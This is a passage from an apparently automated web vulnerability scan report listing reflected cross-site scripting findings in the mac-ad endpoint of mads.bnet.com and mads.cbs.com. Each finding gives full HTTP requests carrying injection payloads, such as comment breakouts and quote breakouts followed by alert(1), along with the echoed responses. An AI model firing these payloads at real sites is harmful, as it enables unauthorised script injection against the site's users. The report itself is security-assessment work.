Expires: Wed, 27 Apr 2011 23:25:10 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A&PTYPE=2001e7710<a>0ef8572a5a4&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='252' PTYPE='2001e7710a0ef8572
...[SNIP]...

3.506. http://mads.bnet.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.bnet.com
Path:	/mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload 1fcfc<a>fe20f774f6c was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=2521fcfc<a>fe20f774f6c&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.bnet.com
Proxy-Connection: keep-alive
Referer: http://moneywatch.bnet.com/?tag=hdr;cnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:24:25 GMT
Server: Apache/2.2
Content-Length: 495
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:24:25 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=2521fcfc<a>fe20f774f6c&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='25212077
...[SNIP]...

3.507. http://mads.bnet.com/mac-ad [cookiesOn parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.bnet.com
Path:	/mac-ad

Issue detail

The value of the cookiesOn request parameter is copied into the HTML document as plain text between tags. The payload 77d0f<a>001c3984914 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=177d0f<a>001c3984914&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.bnet.com
Proxy-Connection: keep-alive
Referer: http://moneywatch.bnet.com/?tag=hdr;cnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:25:55 GMT
Server: Apache/2.2
Content-Length: 488
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:25:55 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=177d0f<a>001c3984914&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='252' PTYPE='2001' NCAT='1:' CID='0' TO BEACON T
...[SNIP]...

3.508. http://mads.bnet.com/mac-ad [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.bnet.com
Path:	/mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3b9d2<a>90d8ba5ff5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1&3b9d2<a>90d8ba5ff5b=1 HTTP/1.1
Host: mads.bnet.com
Proxy-Connection: keep-alive
Referer: http://moneywatch.bnet.com/?tag=hdr;cnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:32:10 GMT
Server: Apache/2.2
Content-Length: 491
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:32:10 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1&3b9d2<a>90d8ba5ff5b=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='252' PTYPE='2001' NCAT='1:' CID='0' TO BEACON TEXT) *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c13-ad-xw3.cnet.c
...[SNIP]...

3.509. http://mads.bnet.com/mac-ad [x-cb parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.bnet.com
Path:	/mac-ad

Issue detail

The value of the x-cb request parameter is copied into the HTML document as plain text between tags. The payload ad96f<a>771f669168d was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651ad96f<a>771f669168d&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.bnet.com
Proxy-Connection: keep-alive
Referer: http://moneywatch.bnet.com/?tag=hdr;cnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:26:40 GMT
Server: Apache/2.2
Content-Length: 488
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:26:40 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651ad96f<a>771f669168d&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='252' PTYPE='2001' NCAT='1:' CID='0' TO BEACON TEXT) *//* MAC [r20101202-0915-v1-1
...[SNIP]...

3.510. http://mads.cbs.com/mac-ad [ADREQ&SP parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the ADREQ&SP request parameter is copied into the HTML document as plain text between tags. The payload d06b3<a>8c8e5258ca7 was submitted in the ADREQ&SP parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=68175691&ADREQ&SP=80d06b3<a>8c8e5258ca7&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:17:52 GMT
Server: Apache/2.2
Content-Length: 576
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:17:52 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=68175691&ADREQ&SP=80d06b3<a>8c8e5258ca7&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='800638852587' CNET-PTYPE='10' POS='100' NCAT='1:' CNET-PARTNER-ID='1' DVAR_PSID='' ) TO
...[SNIP]...

3.511. http://mads.cbs.com/mac-ad [ADREQ&beacon parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into a JavaScript inline comment. The payload 1de4a*/alert(1)//bf220d7c09a was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=49351159&ADREQ&beacon=11de4a*/alert(1)//bf220d7c09a&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1; __utmz=235293011.1303946085.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235293011.1320039961.1303946085.1303946085.1303946085.1; __utmc=235293011; __utmb=235293011.1.10.1303946085

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:17:02 GMT
Server: Apache/2.2
Content-Length: 584
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:17:02 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=49351159&ADREQ&beacon=11de4a*/alert(1)//bf220d7c09a&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='1141220709' SPECIFIED. BEACON CALL FAILED. */;window.CBSI_PAGESTATE='1|3462;BC3462-15|;cbs.com;;|';/* MAC [r20101202-0915-v1-13-13-Json
...[SNIP]...

3.512. http://mads.cbs.com/mac-ad [BRAND parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript inline comment. The payload 57be4*/alert(1)//db0fe803184 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=5757be4*/alert(1)//db0fe803184&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=68175691&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:16:40 GMT
Server: Apache/2.2
Content-Length: 1133
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:16:40 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=5757be4*/alert(1)//db0fe803184&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=68175691&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('
...[SNIP]...

3.513. http://mads.cbs.com/mac-ad [BRAND parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94127'%3balert(1)//dabece2176b was submitted in the BRAND parameter. This input was echoed as 94127';alert(1)//dabece2176b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=5794127'%3balert(1)//dabece2176b&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=68175691&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:16:38 GMT
Server: Apache/2.2
Content-Length: 1134
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:16:38 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=5794127'%3balert(1)//dabece2176b&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVA
...[SNIP]...
<img alt="" height="0" src="http://adlog.com.com/adlog/i/r=15150&sg=1815&o=1%253a&h=cn&p=2&b=5794127';alert(1)//dabece2176b&l=en_US&site=164&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82623B&orh=cbs.com&ort=&oepartner=&epartner=&ppartner=&pdom=www
...[SNIP]...

3.514. http://mads.cbs.com/mac-ad [CELT parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload db102<a>2c9bb9bb9cd was submitted in the CELT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=jsdb102<a>2c9bb9bb9cd&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=68175691&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:15:36 GMT
Server: Apache/2.2
Content-Length: 523
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: text/plain
Expires: Wed, 27 Apr 2011 23:15:36 GMT


...[SNIP]...

3.515. http://mads.cbs.com/mac-ad [COOKIE%3AANON_ID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the COOKIE%3AANON_ID request parameter is copied into a JavaScript inline comment. The payload fef7d*/alert(1)//88e5ac7476a was submitted in the COOKIE%3AANON_ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C1667%3BBC1667-44%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDsfef7d*/alert(1)//88e5ac7476a&x-cb=95815833&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __utmz=235293011.1303946085.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mad_rsi_segs=ASK05540_10066; XCLGFbrowser=Cg8JIk24ijttAAAASDs; CBS_ADV_VAL=c; ABTEST_HOMEPAGE=A; __utma=235293011.1320039961.1303946085.1303946085.1303947395.2; __utmc=235293011; __utmb=235293011.1.10.1303947395

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:39:48 GMT
Server: Apache/2.2
Content-Length: 642
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:39:48 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C1667%3BBC1667-44%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDsfef7d*/alert(1)//88e5ac7476a&x-cb=95815833&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) */;window.CBSI_PAGESTATE='1|1667;BC1667-
...[SNIP]...

3.516. http://mads.cbs.com/mac-ad [DVAR_GENRE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the DVAR_GENRE request parameter is copied into a JavaScript inline comment. The payload fbcf3*/alert(1)//08578095515 was submitted in the DVAR_GENRE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=fbcf3*/alert(1)//08578095515&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=49351159&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1; __utmz=235293011.1303946085.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235293011.1320039961.1303946085.1303946085.1303946085.1; __utmc=235293011; __utmb=235293011.1.10.1303946085

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:16:45 GMT
Server: Apache/2.2
Content-Length: 606
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:16:45 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=fbcf3*/alert(1)//08578095515&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=49351159&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEAC
...[SNIP]...

3.517. http://mads.cbs.com/mac-ad [DVAR_INSTLANG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the DVAR_INSTLANG request parameter is copied into a JavaScript inline comment. The payload 3ff35*/alert(1)//aa0b56aa88c was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US3ff35*/alert(1)//aa0b56aa88c&x-cb=49351159&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
